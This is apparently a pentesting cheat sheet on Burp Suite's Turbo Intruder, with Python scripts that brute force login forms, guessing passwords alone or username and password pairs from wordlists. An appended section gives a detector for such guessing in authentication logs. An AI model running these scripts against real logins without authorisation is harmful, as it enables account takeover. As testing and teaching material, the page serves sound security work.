Turbo Intruder in Burp Suite

Last modified: 2023-08-14

Web

Turbo Intruder is a Burp Suite extension for brute forcing and fuzzing websites.

Using Single Parameter

Set "%s" as the value of the parameter to brute force.
For example, set %s as the value of password to brute force the password.

POST /login HTTP/1.1
...

username=admin&password=%s

Here is the Python cheat sheet. Each loop below is an alternative; use the one that fits the situation.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=5,
                        pipeline=False
                        )

    # Keep only ONE of the loops below; each queued word replaces %s in the request.

    # Brute force (wordlist)
    for word in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute force (0 - 255); range() excludes its upper bound, so use 256
    for i in range(0, 256):
        engine.queue(target.req, str(i))

    # Brute force (0000 - 9999)
    for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphabet)
    for word in open('/usr/share/seclists/Fuzzing/char.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphanum upper-lower)
    for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
        engine.queue(target.req, word.rstrip())

    # Null payloads (infinite loop): nothing after this loop is ever reached
    while True:
        engine.queue(target.req, None)

    # Null payloads (100 loops)
    i = 0
    while i < 100:
        engine.queue(target.req, None)
        i += 1


def handleResponse(req, interesting):
    if interesting:
        table.add(req)

Using Multiple Parameters

In addition to a single parameter, we can brute force multiple parameters, e.g. username and password.

POST /login HTTP/1.1
...

username=%s&password=%s

Here is the Python script. We need to pass one word for each parameter, as below.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=100,
                        pipeline=False)

    # Set multiple words for parameters.
    for word1 in open('/path/to/usernames'):
        for word2 in open('/path/to/passwords'):
            engine.queue(target.req, [word1.rstrip(), word2.rstrip()])


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)
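
How the two request patterns above (one %s in password, and %s in both username and password) show up in server-side authentication logs, as an added detection example that is not part of the original page or of Turbo Intruder. The event tuple layout, the window and threshold values, and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 10   # assumed sliding-window size
MAX_FAILURES = 5      # assumed number of failed logins tolerated per source in one window

# Constructed sample events: (epoch_seconds, source_ip, username, login_succeeded)
SAMPLE_EVENTS = (
    # one account, many passwords (single-parameter pattern)
    [(100 + i * 0.2, "203.0.113.5", "admin", False) for i in range(12)]
    # usernames x passwords (multiple-parameter pattern, three guesses per account)
    + [(200 + i * 0.2, "203.0.113.9", "user%d" % (i // 3), False) for i in range(12)]
    # a legitimate user who mistypes twice, then logs in
    + [(300 + i * 60, "198.51.100.7", "alice", i == 2) for i in range(3)]
)

SINGLE = "single-account guessing"
MULTI = "multi-account guessing"


def detect_guessing(events, window=WINDOW_SECONDS, max_failures=MAX_FAILURES):
    """Return {source_ip: pattern} for sources with more than max_failures
    failed logins inside any sliding window of `window` seconds."""
    recent = defaultdict(deque)  # source_ip -> failed (timestamp, username) in the window
    flagged = {}
    for ts, ip, user, ok in sorted(events):
        if ok:
            continue  # only failed attempts count towards the threshold
        failures = recent[ip]
        failures.append((ts, user))
        # Drop failures that have aged out of the window.
        while ts - failures[0][0] > window:
            failures.popleft()
        if len(failures) > max_failures:
            accounts = {u for _, u in failures}
            pattern = SINGLE if len(accounts) == 1 else MULTI
            # Once a source has been seen hitting several accounts, keep that label.
            if flagged.get(ip) != MULTI:
                flagged[ip] = pattern
    return flagged


if __name__ == "__main__":
    for ip, pattern in sorted(detect_guessing(SAMPLE_EVENTS).items()):
        print(ip, pattern)
```

Keying the counter on source address alone misses guessing spread across many sources, so a production rule would also count failures per target account.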